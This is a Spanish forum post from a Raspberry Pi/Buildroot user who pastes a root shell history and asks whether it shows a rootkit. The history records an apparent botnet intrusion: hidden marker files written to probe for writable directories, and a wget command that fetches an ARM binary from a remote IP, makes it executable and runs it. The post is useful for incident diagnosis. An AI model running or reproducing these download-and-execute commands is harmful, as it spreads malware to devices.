Utilizo Buildroot zImage y la compilación del kernel para mis rpis y busybox para mi caja de comandos de Linux.
Es la segunda vez que parece que tengo un rootkit, una historia de root sh me lo da, así que mi pregunta es: ¿es un rootkit?
324 /bin/busybox cp; /gweerwe323f
325 mount ;/gweerwe323f
326 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
327 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
328 echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon
329 echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon
330 echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon
331 echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon
332 echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon
333 echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon
334 echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon
335 echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; cat /run/.nippon; rm -f /run/.nippon
336 echo -e '\x47\x72\x6f\x70/run/lock' > /run/lock/.nippon; cat /run/lock/.nippon; rm -f /run/lock/.nippon
337 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup' > /sys/fs/cgroup/.nippon; cat /sys/fs/cgroup/.nippon; rm -f /sys/fs/cgroup/.nippon
338 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/systemd' > /sys/fs/cgroup/systemd/.nippon; cat /sys/fs/cgroup/systemd/.nippon; rm -f /sys/fs/cgroup/systemd/.nippon
339 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpuset' > /sys/fs/cgroup/cpuset/.nippon; cat /sys/fs/cgroup/cpuset/.nippon; rm -f /sys/fs/cgroup/cpuset/.nippon
340 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/cpu,cpuacct' > /sys/fs/cgroup/cpu,cpuacct/.nippon; cat /sys/fs/cgroup/cpu,cpuacct/.nippon; rm -f /sys/fs/cgroup/cpu,cpuacct/.nippon
341 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/blkio' > /sys/fs/cgroup/blkio/.nippon; cat /sys/fs/cgroup/blkio/.nippon; rm -f /sys/fs/cgroup/blkio/.nippon
342 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/devices' > /sys/fs/cgroup/devices/.nippon; cat /sys/fs/cgroup/devices/.nippon; rm -f /sys/fs/cgroup/devices/.nippon
343 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/freezer' > /sys/fs/cgroup/freezer/.nippon; cat /sys/fs/cgroup/freezer/.nippon; rm -f /sys/fs/cgroup/freezer/.nippon
344 echo -e '\x47\x72\x6f\x70/sys/fs/cgroup/net_cls' > /sys/fs/cgroup/net_cls/.nippon; cat /sys/fs/cgroup/net_cls/.nippon; rm -f /sys/fs/cgroup/net_cls/.nippon
345 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
346 echo -e '\x47\x72\x6f\x70/dev/mqueue' > /dev/mqueue/.nippon; cat /dev/mqueue/.nippon; rm -f /dev/mqueue/.nippon
347 echo -e '\x47\x72\x6f\x70/sys/kernel/debug' > /sys/kernel/debug/.nippon; cat /sys/kernel/debug/.nippon; rm -f /sys/kernel/debug/.nippon
348 echo -e '\x47\x72\x6f\x70/sys/kernel/config' > /sys/kernel/config/.nippon; cat /sys/kernel/config/.nippon; rm -f /sys/kernel/config/.nippon
349 echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon
350 echo -e '\x47\x72\x6f\x70/boot' > /boot/.nippon; cat /boot/.nippon; rm -f /boot/.nippon
351 echo -e '\x47\x72\x6f\x70/run/user/0' > /run/user/0/.nippon; cat /run/user/0/.nippon; rm -f /run/user/0/.nippon
352 echo -e '\x47\x72\x6f\x70/proc/sys/fs/binfmt_misc' > /proc/sys/fs/binfmt_misc/.nippon; cat /proc/sys/fs/binfmt_misc/.nippon; rm -f /proc/sys/fs/binfmt_misc/.nippon
353 /gweerwe323f
354 cat /bin/echo ;/gweerwe323f
355 cat /proc/cpuinfo;/gweerwe323f
356 cd /; wget http://195.22.127.83/bins/usb_bus.arm7 -O - > usb_bus ; chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f
357 ps aux
358 dmesg